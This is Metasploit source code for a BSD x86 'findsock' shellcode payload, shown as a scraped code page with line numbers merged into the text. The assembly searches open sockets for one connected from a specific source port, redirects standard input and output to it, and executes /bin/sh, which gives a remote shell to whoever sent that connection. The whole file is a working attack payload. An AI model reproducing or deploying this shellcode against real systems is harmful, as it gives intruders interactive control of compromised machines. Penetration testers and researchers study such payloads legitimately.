Path: blob/master/external/source/shellcode/bsd/ia32/single_findsock.asm
19612 views
;1;2; Name: single_findsock3; Qualities: Nothing Special4; Authors: vlad902 <vlad902 [at] gmail.com>5; Version: $Revision: 1846 $6; License:7;8; This file is part of the Metasploit Exploit Framework9; and is subject to the same licenses and copyrights as10; the rest of this package.11;12; Description:13;14; This payload redirects /bin/sh to a socket connected from a15; certain source port.16;17;;181920BITS 322122section .text23global main2425main:26xor edi, edi27push edi28mov ebp, esp2930getpeername_loop:31; 32-bit is okay since the connection should be established already.32inc edi3334mov esp, ebp35push byte 0x1036push esp37push ebp38push edi39push byte 0x1f40pop eax41push byte 0x0242int 0x804344cmp word [ebp + 2], 0x5c1145jne getpeername_loop4647pop ecx4849dup2_loop:50push ecx51push edi52push byte 0x5a53pop eax54push ecx55int 0x8056dec ecx57jns dup2_loop5859push 0x68732f2f60push 0x6e69622f6162mov ebx, esp6364push eax65push esp66push ebx6768mov al, 0x3b69push eax70int 0x80717273